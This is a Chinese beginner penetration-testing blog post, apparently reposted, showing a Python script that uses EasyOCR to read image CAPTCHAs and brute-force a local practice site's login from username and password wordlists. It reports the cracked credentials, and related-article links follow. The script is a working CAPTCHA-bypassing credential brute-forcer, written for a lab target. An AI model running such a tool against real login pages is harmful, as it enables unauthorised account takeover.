渗透测试入门学习——使用python脚本自动识别图片验证码，OCR技术初体验

🕗 发布于 2024-10-06 03:21 ocr python php 网络安全 web安全

写在前面

由于验证码在服务端生成后存储在服务器的session中，而标用于标识用户身份的sessionid存在于用户cookie中

所以本次识别验证码时需要用requests.session()创建会话对象，模拟真实的浏览器行为，保持与服务器的会话才能获取登录时服务器为用户生成验证码，也省去了手动在python代码中手动输入cookie的步骤

安装OCR库（需要python3.9）

Github地址：https://github.com/JaidedAI/EasyOCR

pip install easyocr

相关代码

import requests
import easyocr


# 填入请求地址
code_url = "http://localhost/yanzhengma.php"
login_url = "http://localhost/login.php"

bf_flag = False
# success为未知，但可以尝试出登陆失败的信息
success = ""
failure = ["你的验证码不正确，请重新输入","您输入的用户名不存在","密码错误，请重新输入"] 
count = 0
# easyocr相关初始化设置识别英文字母或数字，不输出详细运行信息
reader = easyocr.Reader(['en'])
# 由于验证码在服务端生成后存储在服务器的session中，而标用于标识用户身份的sessionid存在于用户cookie中
# 所以这里需要用requests.session()创建会话对象，模拟真实的浏览器行为，保持与服务器的会话才能获取登录时为用户生成验证码
session = requests.session()

with open("./user.txt", 'r') as file_usr:
    with open("./pswd.txt", 'r') as file_pwd:
        while not bf_flag:
            first = file_usr.readline()
            if not first:
                break
            # 在内层循环之前，重置文件指针到文件开头实现遍历
            file_pwd.seek(0)
            while not bf_flag:
                second = file_pwd.readline()
                if not second:
                    break
                first = first.strip()
                second = second.strip()
                count += 1
                # 用会话对象向浏览器发请求并将验证码图片保存
                img = session.get(url = code_url).content
                with open('./code.jpg','wb') as code_file:
                    code_file.write(img)
                # 识别验证码内容
                try:
                    result = reader.readtext('./code.jpg')
                    # 取出识别结果
                    target_code = [text for (_, text, _) in result][0]
                except:
                    print("第"+ str(count) +"次尝试--失败：识别出现错误")
                if len(target_code) < 4:
                    print("第" + str(count) + "次尝试--验证码识别出错")
                    print(target_code)
                response = session.post(url = login_url,
                                        data = {"name":first, "pwd":second, "yzm":target_code ,"login":"%E7%99%BB%E5%BD%95"})
                print(response.text)
                check_flag = True
                for context in failure:
                    if context in response.text:
                        print("第"+ str(count) +"次尝试--失败：",first + " " + second)
                        check_flag = False
                        break;
                if check_flag:
                    print("第"+ str(count) +"次尝试--成功：",first + " " + second)
                    bf_flag = True;
                    break;

使用方式

进入靶场随意尝试

发现是用POST方式进行的请求，请求地址为/login.php需要将此地址填入脚本相应位置

右键验证码部分查看生成验证码的请求地址

复制链接进行尝试，刷新一次即可得到一个随机的验证码,需要将此地址填入脚本相应位置

运行脚本等待结果，由于OCR识别会有各种各样的问题，有时需要重复跑几遍才能得到想要的结果

可以看到账号为admin密码为1234556时没有产生报错信息，暴力破解成功

原文地址：https://blog.csdn.net/qq_44611153/article/details/142709397

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！

上一篇：GO网络编程（四）：海量用户通信系统2：登录功能核心【重难点】
下一篇：Json-Rpc框架（JsonCpp库使用介绍）

智能路由器hack技术
OpenWrt 可以被描述为一个嵌入式的 Linux 发行版，（主流路由器固件有 dd-wrt,tomato,openwrt三类）而不是试图建立一个单一的、静态的系统。OpenWrt的包管理提供了一个
阅读更多2024-10-08
练习题 - Scrapy爬虫框架 Settings 项目配置
在某些情况下，目标网站可能会根据请求头的特定信息来判断请求是否合法。请配置一个 Scrapy 爬虫，设置自定义请求头，包括Referer和。自定义请求头可以通过配置项进行设置。可以在中定义请求头的内容
阅读更多2024-10-08
js拼接html代码在线工具
js拼接html代码在线工具
阅读更多2024-10-08
实例分割、语义分割和 SAM（Segment Anything Model）
实例分割、语义分割和都是图像处理中的重要技术，它们的目标是通过分割图像中的不同对象或区域来帮助识别和分析图像，但它们的工作方式和适用场景各有不同。
阅读更多2024-10-08
如何将 cryptopp库移植到UE5内
这段时间在折腾UE5.4.4，学习的过程中，准备把cryptopp移植到游戏的工程内，但UE的编译环境和VS的编译环境完全不同，能在VS下顺利编译的cryptopp代码，移植之后，全在报错，错误千奇百
阅读更多2024-10-08
Linux: network: 典型网络延迟图，CPU导致；
这个可能的原因就是，进来的包被queue在了二层之前：或者是当前VM的网卡或者驱动，或者是网络上的某个设备。警告后续的分析，在主机上的vnet抓包看，发现包已经转发到了VM层，也就是收进来的包被缓存
阅读更多2024-10-08
redis-数据类型
这里的key使用的是用户id，然后偏移量表示天数，value和之前一致，便于统计某个用户累计签到（与之前统计系统某一段时间用户签到量做对比）节点在操作锁资源的时候，setnx lock uuid，操作
阅读更多2024-10-08
机器学习——自监督学习与无监督学习
自监督学习和无监督学习是解决数据标注不足问题的重要工具。无监督学习通过聚类、降维等方法揭示数据的内在结构，而自监督学习则通过构建辅助任务利用未标注数据来提高模型在下游任务中的表现。通过本文，我们不仅讨
阅读更多2024-10-08
ARM（5）内存管理单元MMU
假如内存不足会怎么样？内存碎片问题怎么解决？多个程序指向相同的地址如何处理？
阅读更多2024-10-08
Redis：cpp.redis++通用接口
讲解Redis的C++客户端redis++
阅读更多2024-10-08

渗透测试入门学习——使用python脚本自动识别图片验证码，OCR技术初体验

写在前面

安装OCR库（需要python3.9）

相关代码

使用方式

相关文章